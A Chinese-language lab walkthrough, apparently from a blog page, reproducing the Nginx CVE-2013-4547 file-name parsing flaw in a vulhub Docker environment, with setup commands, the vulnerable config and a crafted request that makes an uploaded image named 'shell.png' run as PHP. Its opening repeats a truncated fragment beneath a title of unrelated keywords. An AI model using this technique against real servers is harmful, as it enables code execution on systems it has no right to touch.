微信 绑定网站,dedecms网站tag标签静态化,简易手工制作,seo排名计费系统CVE-2013-4547 一、环境搭建二、漏洞原理三、漏洞复现 一、环境搭建 如下介绍kali搭建的教程 cd ~/vulhub/nginx/CVE-2013-4547 // 进入指定环境
docker-compose build // 进行环境编译
docker-compose up -d // 启动环境docker-compose ps使用这条命令查看当前正在运… CVE-2013-4547 一、环境搭建二、漏洞原理三、漏洞复现 一、环境搭建 如下介绍kali搭建的教程 cd ~/vulhub/nginx/CVE-2013-4547 // 进入指定环境
docker-compose build // 进行环境编译
docker-compose up -d // 启动环境docker-compose ps使用这条命令查看当前正在运行的环境,如下所示 环境启动后访问http://your-ip:8080/即可看到一个上传页面。
二、漏洞原理 这个漏洞其实和代码执行没有太大关系其主要原因是错误地解析了请求的URI错误地获取到用户请求的文件名导致出现权限绕过、代码执行的连带影响。Nginx匹配到.php结尾的请求就发送给fastcgi进行解析常见的写法如下 location ~ \.php$ {include fastcgi_params;fastcgi_pass 127.0.0.1:9000;fastcgi_index index.php;fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;fastcgi_param DOCUMENT_ROOT /var/www/html;
}正常情况下关闭pathinfo的情况下只有.php后缀的文件才会被发送给fastcgi解析。而存在CVE-2013-4547的情况下我们请求1.gif[0x20][0x00].php这个URI可以匹配上正则.php$可以进入这个Location块但进入后Nginx却错误地认为请求的文件是1.gif[0x20]就设置其为SCRIPT_FILENAME的值发送给fastcgi。 fastcgi根据SCRIPT_FILENAME的值进行解析最后造成了解析漏洞。
三、漏洞复现 访问http://your-ip:8080/,界面如下所示一个文件上传界面 上传一个图片文件其中带有恶义代码如下所示 访问该文件并抓包
GET /uploadfiles/shell.pngaa.php HTTP/1.1
Host: 你的IP:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1把aa改为2000并换掉IP再发送 使用docker-compose stop停掉环境
